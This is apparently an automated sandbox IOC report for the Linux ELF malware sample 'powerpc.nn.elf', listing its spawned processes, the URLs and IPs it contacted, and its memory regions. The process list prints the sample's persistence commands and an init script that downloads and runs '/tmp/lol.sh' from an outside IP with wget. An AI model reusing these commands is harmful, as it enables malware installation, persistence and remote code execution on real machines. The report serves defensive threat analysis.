Automated Malware Analysis IOC Report for

Files

File Path

Type

Processes

Path

Cmdline

Malicious

/tmp/powerpc.nn.elf

/bin/sh

sh -c "systemctl enable custom.service >/dev/null 2>&1"

/bin/sh

/usr/bin/systemctl

systemctl enable custom.service

/tmp/powerpc.nn.elf

/bin/sh

sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"

/bin/sh

/usr/bin/chmod

chmod +x /etc/init.d/system

/tmp/powerpc.nn.elf

/bin/sh

sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"

/bin/sh

/usr/bin/ln

ln -s /etc/init.d/system /etc/rcS.d/S99system

/tmp/powerpc.nn.elf

/bin/sh

sh -c "echo \"#!/bin/sh\n# /etc/init.d/powerpc.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting powerpc.nn.elf'\n /tmp/powerpc.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping powerpc.nn.elf'\n killall powerpc.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/powerpc.nn.elf"

/tmp/powerpc.nn.elf

/bin/sh

sh -c "chmod +x /etc/init.d/powerpc.nn.elf >/dev/null 2>&1"

/bin/sh

/usr/bin/chmod

chmod +x /etc/init.d/powerpc.nn.elf

/tmp/powerpc.nn.elf

/bin/sh

sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"

/bin/sh

/usr/bin/mkdir

mkdir -p /etc/rc.d

/tmp/powerpc.nn.elf

/bin/sh

sh -c "ln -s /etc/init.d/powerpc.nn.elf /etc/rc.d/S99powerpc.nn.elf >/dev/null 2>&1"

/bin/sh

/usr/bin/ln

ln -s /etc/init.d/powerpc.nn.elf /etc/rc.d/S99powerpc.nn.elf

/tmp/powerpc.nn.elf

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/systemd/systemd

/usr/lib/systemd/system-environment-generators/snapd-env-generator

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/libexec/gnome-session-binary

/bin/sh

/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping

/usr/libexec/gsd-housekeeping

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

There are 36 hidden processes, click here to show them.

URLs

Name

Malicious

http://94.156.227.233/curl.sh

unknown

Details

Name:	http://94.156.227.233/curl.sh
TargetID:	12
From Memory:	true
Current Path:	/tmp/powerpc.nn.elf
Source:	powerpc.nn.elf
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

http://94.156.227.233/lol.sh

unknown

Details

Name:	http://94.156.227.233/lol.sh
TargetID:	12
From Memory:	true
Current Path:	/tmp/powerpc.nn.elf
Source:	powerpc.nn.elf
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s

unknown

Details

Name:	http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s
TargetID:	12
From Memory:	true
Current Path:	/tmp/powerpc.nn.elf
Source:	powerpc.nn.elf
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
URLs found in memory or binary data	Networking

http://94.156.227.233/

unknown

Details

Name:	http://94.156.227.233/
TargetID:	-1
From Memory:	true
Source:	powerpc.nn.elf, profile.12.dr, system.12.dr, inittab.12.dr, bootcmd.12.dr, powerpc.nn.elf.30.dr, custom.service.12.dr
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

IPs

Domain

Country

Malicious

105.245.248.59

unknown

South Africa

79.116.71.87

unknown

Romania

118.113.69.76

unknown

China

4.210.58.183

unknown

United States

119.199.116.233

unknown

Korea Republic of

134.233.253.158

unknown

United States

222.77.122.157

unknown

China

172.32.247.119

unknown

United States

152.173.246.96

unknown

Chile

202.198.129.176

unknown

China

99.214.187.128

unknown

Canada

131.84.47.111

unknown

United States

130.217.96.249

unknown

New Zealand

42.221.201.117

unknown

China

165.127.169.218

unknown

United States

116.1.59.161

unknown

China

42.48.97.156

unknown

China

75.90.138.2

unknown

United States

175.149.183.30

unknown

China

106.202.139.133

unknown

India

121.102.7.74

unknown

Japan

156.5.17.103

unknown

United States

89.58.14.78

unknown

Germany

218.161.117.181

unknown

Taiwan; Republic of China (ROC)

43.160.132.63

unknown

Japan

113.118.153.148

unknown

China

34.110.119.85

unknown

United States

77.191.15.232

unknown

Germany

164.114.73.13

unknown

United States

183.151.74.111

unknown

China

152.175.31.9

unknown

Chile

11.88.28.80

unknown

United States

175.149.121.228

unknown

China

108.152.13.60

unknown

United States

142.80.109.119

unknown

Canada

143.10.136.63

unknown

United States

214.126.211.37

unknown

United States

149.168.217.163

unknown

United States

216.37.255.225

unknown

United States

36.105.174.59

unknown

China

88.234.24.80

unknown

Turkey

68.173.185.16

unknown

United States

104.4.1.104

unknown

United States

156.64.181.45

unknown

United States

132.45.236.189

unknown

United States

13.67.8.87

unknown

United States

146.232.174.236

unknown

South Africa

94.14.218.66

unknown

United Kingdom

182.0.120.188

unknown

Indonesia

81.84.184.96

unknown

Portugal

105.58.114.78

unknown

Kenya

139.35.229.59

unknown

United States

123.19.56.244

unknown

Viet Nam

107.167.90.100

unknown

United States

203.204.81.178

unknown

Taiwan; Republic of China (ROC)

89.196.61.206

unknown

Iran (ISLAMIC Republic Of)

40.8.161.183

unknown

United States

92.28.230.225

unknown

United Kingdom

216.202.55.175

unknown

United States

195.250.115.248

unknown

Serbia

197.133.96.138

unknown

Egypt

193.108.180.109

unknown

France

108.88.32.176

unknown

United States

104.173.143.106

unknown

United States

24.65.200.33

unknown

Canada

121.133.203.131

unknown

Korea Republic of

190.106.10.23

unknown

Nicaragua

148.76.61.134

unknown

United States

82.255.169.118

unknown

France

37.77.105.120

unknown

Russian Federation

173.5.57.62

unknown

United States

202.107.3.41

unknown

China

62.57.232.137

unknown

Spain

99.165.120.190

unknown

United States

54.154.131.169

unknown

United States

178.55.38.86

unknown

Finland

100.53.145.222

unknown

United States

156.39.129.246

unknown

United States

189.100.66.174

unknown

Brazil

187.37.118.81

unknown

Brazil

45.101.119.235

unknown

Egypt

209.8.28.229

unknown

United States

63.228.154.13

unknown

United States

172.60.6.31

unknown

United States

62.64.198.207

unknown

United Kingdom

180.216.64.254

unknown

Australia

135.9.171.187

unknown

United States

97.94.57.108

unknown

United States

160.0.161.208

unknown

Senegal

76.222.173.240

unknown

United States

76.246.121.191

unknown

United States

47.90.18.37

unknown

United States

164.91.159.26

unknown

United States

39.28.151.243

unknown

Korea Republic of

116.18.43.9

unknown

China

135.206.125.54

unknown

United States

23.64.245.25

unknown

United States

167.110.137.105

unknown

United States

77.93.177.166

unknown

Romania

131.203.143.61

unknown

New Zealand

There are 90 hidden IPs, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

7fe2c001b000

page execute read

7fe3b666b000

page read and write

7fe3b0000000

page read and write

7ffda7b5a000

page read and write

564ce0e6a000

page read and write

7ffda7b82000

page execute read

7fe3b5ff5000

page read and write

7fe3b0021000

page read and write

7fe3b57e4000

page read and write

7fe3b6b2c000

page read and write

564cdebcb000

page execute read

564ce2618000

page read and write

7fe3b6ae7000

page read and write

7fe3b6646000

page read and write

7fe2c0030000

page read and write

7fe2c002b000

page read and write

7fe3b6adf000

page read and write

564cdee4e000

page read and write

564ce0e54000

page execute and read and write

7fe3b69b6000

page read and write

7fe3b6284000

page read and write

564cdee56000

page read and write

7fe3b5fe7000

page read and write

There are 13 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
powerpc.nn.elf

Files

Processes

URLs

IPs

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportpowerpc.nn.elf

Files

Processes

URLs

IPs

Memdumps

IOC Report
powerpc.nn.elf